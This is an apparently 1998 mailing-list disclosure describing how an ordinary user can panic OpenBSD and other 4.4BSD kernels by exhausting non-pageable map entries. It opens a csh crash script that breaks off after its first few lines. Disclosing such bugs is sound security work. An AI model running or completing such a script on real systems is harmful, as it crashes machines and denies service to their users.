Simple OpenBSD crash script

From: Jason Downs (downsjat_private)
Date: Sun Jan 25 1998 - 15:54:25 PST

    Here is a rather simple method of crashing most OpenBSD systems (and, I
    assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).

    Most, if not all, kernels have process limits high enough for a normal
    user to run the kernel out of non-pageable map entries.  The easiest way
    that I have found to do this is with the enclosed script.

    If the per-user process/descriptor limits are high enough, running this script
    will result in a kernel panic.

    #!/bin/csh
    set path = ( /usr/bin /usr/sbin /bin /sbin )

    unlimit
    cd /tmp
    if ( -e fifo ) then
        rm fifo